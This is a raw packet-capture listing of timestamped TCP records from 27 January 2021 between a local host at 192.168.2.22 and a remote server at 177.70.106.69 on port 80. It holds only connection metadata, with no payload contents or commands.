Jan 27, 2021 19:09:18.958045959 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958095074 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958098888 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958101034 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958127975 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958146095 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958154917 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958180904 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958199978 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958203077 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958239079 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958262920 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958298922 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958324909 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958332062 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958352089 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958355904 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958378077 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958408117 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958417892 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958421946 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958431959 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958462954 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958482027 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958489895 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958520889 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958534956 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958542109 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958570957 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958589077 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958597898 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958616972 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958627939 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958645105 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958657026 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958678007 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958684921 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958702087 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958719969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958749056 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958776951 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958782911 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958786011 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958791018 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958818913 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958827019 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958847046 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958872080 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958878040 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958889008 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958898067 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958925962 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958940029 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958951950 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958965063 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958978891 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958990097 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958997965 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959006071 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959034920 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959038019 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959043026 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959067106 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959093094 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959094048 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959105015 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959137917 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959497929 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959559917 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959573030 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959597111 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959608078 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959630966 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.959636927 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.959676027 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.963551044 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.963587046 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.234428883 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.234467030 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.234647989 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.234652042 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.234755039 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.234956980 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.234975100 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.235028028 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.235107899 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.235168934 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.235272884 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.235332012 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.235405922 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.235465050 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.235992908 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.236079931 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.236239910 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.236316919 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.236419916 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.236488104 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.236489058 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.236553907 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.236613989 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.236679077 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.236741066 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.236793995 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.236885071 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.236941099 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.236999035 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.237060070 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.237381935 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238620043 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238643885 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238660097 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238672018 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238689899 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238702059 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238707066 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238717079 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238729954 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238746881 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238749027 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238759041 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238776922 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238789082 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238807917 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238815069 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238818884 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238830090 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238836050 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238853931 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238854885 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238866091 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238881111 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238893032 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238910913 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238917112 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238922119 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238924980 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238934994 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238951921 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238953114 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238964081 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238981009 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.238981009 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.238991976 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.239008904 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.239021063 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.239037991 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.239054918 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.239057064 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.239064932 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.239068985 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.239074945 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.239094019 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.239105940 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.239125013 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.239242077 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.240047932 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.507842064 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.507882118 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.507908106 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.507931948 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.507936001 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.507952929 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.507962942 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.507965088 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.507978916 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.507996082 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.507998943 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.508025885 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508045912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508074045 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508090019 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.508101940 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508135080 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508152962 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.508164883 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508191109 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508193016 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.508217096 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508244038 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508255959 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.508269072 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.508301973 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.508326054 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.509226084 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514291048 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514322042 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514348030 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514380932 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514410019 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514415026 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514437914 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514453888 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514465094 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514466047 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514492035 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514518023 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514520884 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514527082 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514544010 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514549017 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514568090 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514569998 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514595032 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514611959 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514626026 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514652967 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514662981 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514681101 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514703035 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514708996 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514729023 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514735937 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514750957 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514761925 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514772892 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514787912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514807940 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514816046 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514833927 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514848948 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514864922 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514878035 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514888048 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514904976 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514930964 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514959097 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.514975071 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.514997959 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515000105 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515031099 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515043974 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515089035 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515129089 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515157938 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515183926 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515207052 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515228987 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515233994 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515270948 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515275955 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515300989 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515324116 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515328884 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.515393019 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.515738964 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778439045 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778484106 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778512001 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778538942 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778564930 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778597116 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778620005 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778639078 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778657913 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778676987 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778695107 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778713942 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778732061 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778742075 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778759003 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778759956 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778779984 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778781891 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778800964 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778805971 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778820992 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778846025 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778846979 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778868914 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778872967 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778896093 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778902054 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778915882 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778925896 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778938055 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778958082 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778959036 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778978109 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.778992891 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.778996944 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779020071 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779036999 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779042006 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779066086 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779073954 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779089928 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779110909 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779117107 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779141903 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779141903 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779170990 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779181004 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779196024 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779216051 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779226065 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779252052 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779252052 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779285908 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779311895 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779320955 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779337883 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779356003 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779366016 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779395103 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779396057 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779436111 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779463053 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779475927 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779490948 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779510021 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779520988 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779546976 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779547930 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779583931 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779604912 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779619932 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779632092 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779656887 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779659986 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779701948 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779706955 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779742002 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779756069 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779778957 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779783964 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779813051 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779814959 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779854059 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.779865026 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.779892921 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.784109116 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.784166098 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.784204006 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.784235954 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.784239054 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.784275055 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.784275055 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.784279108 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.784315109 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.784334898 CET	49168	80	192.168.2.22	177.70.106.69
